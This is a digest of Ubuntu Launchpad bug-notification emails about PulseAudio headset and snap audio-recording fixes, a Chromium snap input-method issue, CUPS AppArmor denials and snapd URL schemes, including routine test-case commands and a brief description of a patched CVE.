desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1878621] Re: [snap] uim input method does not work
I suggest following/participating in the discussion in the forum topic for snapd/ecosystem updates and use this bug to track chromium-browser's use of those updates. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1878621 Title: [snap] uim input method does not work Status in chromium-browser package in Ubuntu: Confirmed Bug description: I use the uim input method, which works fine with non-snap apps, and used to work with the non-snap package of Chromium. In 20.04, chromium package now becomes a snap, and uim input method not longer works (rendering the browser useless). With some searching I found similar issues with other input methods, some of which have been addresses. It appears that it is now the responsibility of every snap packager to support input methods, and the snap cannot rely upon system-configured methods. So please support UIM. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1878621/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
Rather than superseding 1:13.99.1-1ubuntu4 in groovy-proposed, I instead based the changes in 1:13.99.1-1ubuntu5 on top of 1:13.99.1-1ubuntu4 to address the CVE that was fixed in https://usn.ubuntu.com/4355-1/. ** Also affects: pulseaudio (Ubuntu Groovy) Importance: High Assignee: Kai-Heng Feng (kaihengfeng) Status: Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1876065 Title: After unplug headphones and plug them again no sound can be heard Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Focal: Fix Committed Status in pulseaudio source package in Groovy: Fix Committed Bug description: * Impact Sound isn't automatically redirected to headphones when those are connected to a jack interface * Test case Disconnect the headsets Start your webbrowser/music player/video player and play some sound Connect the headsets to the jack interface -> the sound should be directly redirected to the plugged headsets * Regression potential Check that audio routing when connecting/disconnecting devices to the hack entry is working correctly After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound. I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged. Source #1 State: RUNNING Name: alsa_input.pci-_00_1f.3.analog-stereo Description: Built-in Audio Analog Stereo Driver: module-alsa-card.c Sample Specification: s16le 2ch 44100Hz Channel Map: front-left,front-right Owner Module: 7 Mute: yes Attached three outputs: headset-in.txt - after startup with headset plugged - all fine. headset-out.txt - after unplugged headset - sound through the speaker - all fine. headset-back.txt - after plugged headset back - no sound. Any help greatly appreciated. Regards, Roman To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1876065/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
Uploaded https://launchpad.net/ubuntu/+source/pulseaudio/1:13.99.1-1ubuntu5 to groovy based on 1:13.99.1-1ubuntu4 from groovy-proposed. ** Changed in: pulseaudio (Ubuntu Groovy) Status: In Progress => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: Fix Committed Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
I'll apply the focal patch to what is in groovy-proposed. ** Changed in: pulseaudio (Ubuntu Groovy) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: pulseaudio (Ubuntu Groovy) Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: In Progress Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: In Progress Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, the upload to bionic-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1869819 Title: [SRU] System can't detect external headset in the codec of Conexant Status in OEM Priority Project: Confirmed Status in OEM Priority Project bionic series: New Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Bionic: In Progress Status in pulseaudio source package in Focal: Fix Released Bug description: [Impact] In some hp's devices, there are two audio jacks(one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec. [Test Case] 1. Insert 4 rings(3 stripes) headset into front audio port (headset icon) 2. Check System Setting->Sound->Output [Expected result] Can detect external headset [Actual result] Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine. [Regression Potential] Low. [Failure rate] 100% [Additional information] system-product-name: HP EliteDesk 800 G5 SFF CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x) GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02) OS-version: 18.04 kernel-version: 4.15.0-1065-oem pulseaudio-version: 1:11.1-1ubuntu7.2 Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272 Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819 PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819 To manage notifications about this bug go to: https://bugs.launchpad.net/oem-priority/+bug/1869819/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
FYI, the upload to focal-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1876065 Title: After unplug headphones and plug them again no sound can be heard Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Focal: Fix Committed Bug description: * Impact Sound isn't automatically redirected to headphones when those are connected to a jack interface * Test case Disconnect the headsets Start your webbrowser/music player/video player and play some sound Connect the headsets to the jack interface -> the sound should be directly redirected to the plugged headsets * Regression potential Check that audio routing when connecting/disconnecting devices to the hack entry is working correctly After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound. I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged. Source #1 State: RUNNING Name: alsa_input.pci-_00_1f.3.analog-stereo Description: Built-in Audio Analog Stereo Driver: module-alsa-card.c Sample Specification: s16le 2ch 44100Hz Channel Map: front-left,front-right Owner Module: 7 Mute: yes Attached three outputs: headset-in.txt - after startup with headset plugged - all fine. headset-out.txt - after unplugged headset - sound through the speaker - all fine. headset-back.txt - after plugged headset back - no sound. Any help greatly appreciated. Regards, Roman To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1876065/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
** Changed in: pulseaudio (Ubuntu Groovy) Importance: High => Medium ** Changed in: pulseaudio (Ubuntu Focal) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Eoan) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Bionic) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Xenial) Importance: Undecided => Medium ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: Triaged Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: Triaged Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1873764] Re: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id
*** This bug is a duplicate of bug 1872564 *** https://bugs.launchpad.net/bugs/1872564 This is a dupe of https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 which, AIUI, the server team will be performing an SRU for. ** This bug has been marked a duplicate of bug 1872564 /proc/sys/kernel/random/boot_id rule missing from abstractions/nameservice -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1873764 Title: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id Status in cups package in Ubuntu: Confirmed Bug description: I noted the following messages on a just installed Ubuntu Focal: $ dmesg | grep cups [ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice" [ 1776.623181] audit: type=1400 audit(1587372145.693:3012): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15510 comm="cups-browsed" capability=23 capname="sys_nice" [ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426074] audit: type=1400 audit(1587372409.494:3015): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426092] audit: type=1400 audit(1587372409.494:3016): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426106] audit: type=1400 audit(1587372409.494:3017): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404914] audit: type=1400 audit(1587372410.473:3018): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404920] audit: type=1400 audit(1587372410.473:3019): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404926] audit: type=1400 audit(1587372410.473:3020): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404953] audit: type=1400 audit(1587372410.473:3021): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404963] audit: type=1400 audit(1587372410.473:3022): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925327] audit: type=1400 audit(1587372440.994:3028): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925330] audit: type=1400 audit(1587372440.994:3029): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925337] audit: type=1400 audit(1587372440.994:3030): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925382] audit: type=1400 audit(1587372440.994:3031): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925391] audit: type=1400 audit(1587372440.994:3032): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 It happened after installing Brother DCPL3550CDW Linux drivers. ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: cups-daemon 2.3.1-9ubuntu1 ProcVersionSignature: Ubuntu 5.4.0-25.29-lowlatency 5.4.30 Uname: Linux 5.4.0-25-lowlatency x86_64 NonfreeKer
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, there is a pending update that will go out either tomorrow or early next week. Please base your next upload on this update. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1869819 Title: [SRU] System can't detect external headset in the codec of Conexant Status in OEM Priority Project: Confirmed Status in OEM Priority Project bionic series: New Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Bionic: In Progress Status in pulseaudio source package in Focal: Fix Released Bug description: [Impact] In some hp's devices, there are two audio jacks(one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec. [Test Case] 1. Insert 4 rings(3 stripes) headset into front audio port (headset icon) 2. Check System Setting->Sound->Output [Expected result] Can detect external headset [Actual result] Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine. [Regression Potential] Low. [Failure rate] 100% [Additional information] system-product-name: HP EliteDesk 800 G5 SFF CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x) GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02) OS-version: 18.04 kernel-version: 4.15.0-1065-oem pulseaudio-version: 1:11.1-1ubuntu7.2 Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272 Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819 PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819 To manage notifications about this bug go to: https://bugs.launchpad.net/oem-priority/+bug/1869819/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1776873] Re: Whitelisted allowedURLschemes breaks some desktop apps
FYI, in recent PR discussions[1] we've acknowledged that we should make it easier to allow different URL schemes into snapd and I laid out some criteria/process ideas on how to make this happen, and I applied that criteria to the zoommtg PR and it was merged quickly. I discussed with Samuele that we could make this go even faster if we codify things for reviewers as well as some other implementation details. In short, today, the snapd team is in a position to be more responsive with adding new url schemes and we'll make it so we can go even faster. For people who want snapd to support new URL schemes I suggest doing one of: * if you are able, submitting a PR to snapd[2] for the URL schemes you are interested in * filing a new bug[3] for the requested url scheme (eg, "add support for url scheme ...") and then someone can take a look Thanks [1]https://github.com/snapcore/snapd/pull/7731#pullrequestreview-362900171 [2]https://github.com/snapcore/snapd [3]https://bugs.launchpad.net/snapd/+filebug -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1776873 Title: Whitelisted allowedURLschemes breaks some desktop apps Status in snapd: Triaged Status in chromium-browser package in Ubuntu: Confirmed Bug description: https://github.com/snapcore/snapd/blob/7952972d4897e085030b288e44dc98b824f6723a/userd/launcher.go#L55 snapd has a hard-coded list of allowed URL schemes. Currently that is limited to "http", "https", "mailto", "snap". We have a number of applications in the store which are trying to use protocol handlers outside this scope and break when that's not possible. e.g. Telegram Desktop: tg:/ Github Desktop: git:/ IRCCloud Desktop: irc:/ These are the ones I know of, others may also be affected. Can we please at least expand the list to those that we know of, and perhaps research other popular protocol handlers? Ideally we wouldn't have a whitelist, because this delays our ability to land new applications with as-yet unknown url schemes. To manage notifications about this bug go to: https://bugs.launchpad.net/snapd/+bug/1776873/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed- migration/xenial/update_excuses.html shows no autopkgtest regression for xenial. I also ran through the TEST CASE for this bug and xenial passed. Marking verification-done-xenial ** Tags removed: verification-failed-xenial ** Tags added: verification-done-xenial -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed- migration/bionic/update_excuses.html shows no autopkgtest regression for bionic. I also ran through the TEST CASE for this bug and bionic passed. Marking verification-done-bionic. ** Tags removed: verification-failed verification-failed-bionic ** Tags added: verification-done-bionic ** Tags added: verification-done -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic 